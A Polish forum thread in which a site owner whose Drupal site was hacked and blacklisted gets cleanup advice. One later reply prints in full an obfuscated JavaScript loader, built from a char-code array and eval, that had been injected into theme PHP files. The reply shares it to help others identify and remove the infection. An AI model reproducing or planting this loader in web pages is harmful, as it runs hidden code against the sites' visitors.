Atak na serwer. Złośliwe oprogramowanie i skutek: blokada strony

31 Grudzień, 2012 - 16:51

Wiem, że pora nie ta i czas ale mój serwer został zaatakowany i potrzebuję pomocy. Mam serwer na home.pl, do tej pory chyba od 2009r. nigdy nie miałem problemów z atakami przynajmniej tych rozmiarów. Jeden raz miałem niechcianego gościa, bo zapomniałem wprowadzić kilka narzędzi. Dwa dni temu weszły po stronie serwera do folderu na której postawiłem jedną ze stron w drupalu i pojawiły się dziwne pliki, zaśmiecony ogólnie cały folder. Więc usunąłem co trzeba i wszystko grało. Wczoraj google wprowadził stronę na Black List. Wyskakuje dziwny komunikat, że wchodzę na własną odpowiedzialność. Jak to odkręcić? Do kogo się zgłosić? Mieliście takie przypadki?

Jeżeli ktoś w ten dzień jest na forum proszę o pomoc.

31 Grudzień, 2012 - 17:03

Z takich łatwiejszych czynności to:

1) wywalenie wgranych plików
2) zmiana haseł
3) sprawdzenie bazy - może jakieś dziwne wpisy etc.
4) sprawdzenie ostatnio instalowanych modułów/skórek - może któryś ma dziurę - luknąć na issue ostatnio instalowanych
5) czekanie aż Google ponownie zweryfikuje Twoją stronę

Tak opcjonalnie to bym zainstalował bad behavior lub httb:bl

Plus można w Google wklepać nazwę wgranego pliku lub fragment kodu który dopisuje do strony, nie zawsze ale czasami pozwala to zidentyfikować szkodnika - kto/co/jak dodaje.

No i przede wszystkim sprawdzenie swojego kompa, 90% szkodników dostaje się za naszą pomocą - np: dziurawy program FTP.

31 Grudzień, 2012 - 17:57

Dzięki Mati! Porady jak najbardziej przydatne.Co jak co, ale na Ciebie zawsze można liczyć. Szczęśliwego Nowego 2013 Roku!!! No i zabawy szampańskiej do białego rana!

Do zobaczenia w przyszłym roku!

7 Styczeń, 2013 - 02:12

Dalej strona jest zablokowana!!!!

  • Stronę zaktualizowałem,
  • Usunąłem zarażone 2 pliki .js oraz .ico(wchodząc na stronkę kaspersky mnie o nim poinformował),
  • Zmieniłem hasła userów,
  • Zmieniłem hasło FTP,
  • Zmieniłem login i hasło admina,
  • Sprawdziłem bazę - jest czysta,
  • Zweryfikowałem stronę w panelu google...

... i nic. Chrome, Opera, IE otwiera bez problemu, Firefox się uwziął :((((

Co mogę jeszcze zrobić?

7 Styczeń, 2013 - 11:56

Jeżeli wyczyściłeś cache liskowi, to pozostaje Ci zaczekać dzień, dwa aż lisek przestanie traktować stronę jako szkodnika.

5 luty, 2013 - 11:51

Wiem, że temat już może być nieaktualny ale napiszę dla potomności.
Miałem bardzo podobny przypadek. Objawiało się to tym, że Kaspersky blokował wyświetlanie strony i wyświetlał komunikat o błędzie (nie pamiętam już treści)

Winowajcą tego był szkodliwy kod, który został wstrzyknięty do wszystkich plików z rozszerzeniem .php w folderach themes.

Kody wyglądał następująco:

#336988#
echo " try{window.document.body++}catch(gdsgsdg){dbshre=133;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,114,112,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,110,113,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,98,104,113,92,107,109,94,98,37,91,91,91,41,103,100,40,99,104,94,39,107,95,103,88,113,39,106,99,103,31,52,7,5,23,24,25,26,114,112,38,108,110,116,99,93,39,106,106,106,97,109,99,106,101,24,54,26,34,88,90,108,105,103,108,108,94,33,54,4,2,25,26,27,23,111,114,40,110,107,113,101,95,41,89,103,107,94,96,105,24,54,26,34,39,31,52,7,5,23,24,25,26,114,112,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,114,112,38,108,110,116,99,93,39,113,100,91,108,97,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,113,116,37,107,109,115,103,92,38,101,95,97,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,111,114,40,110,107,113,101,95,41,107,103,105,26,56,23,31,42,106,115,30,51,6,4,8,1,24,25,26,27,96,94,25,34,28,91,103,92,111,104,92,102,109,40,98,92,108,62,102,96,100,93,103,110,61,112,65,93,34,34,110,113,32,35,36,23,115,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,111,107,99,111,92,32,32,54,95,96,110,25,99,95,52,84,32,113,116,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,112,115,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,114,112,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s=\"\";for(i=0;i-462!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}";

#/336988#

Aby się tego pozbyć napisałem funkcję w php'ie, która wyszukiwała w plikach php ww kod i go kasowała. Po wyczyszczeniu pamięci wszystko wróciło do normy.

2 Sierpień, 2017 - 15:02

yyyyy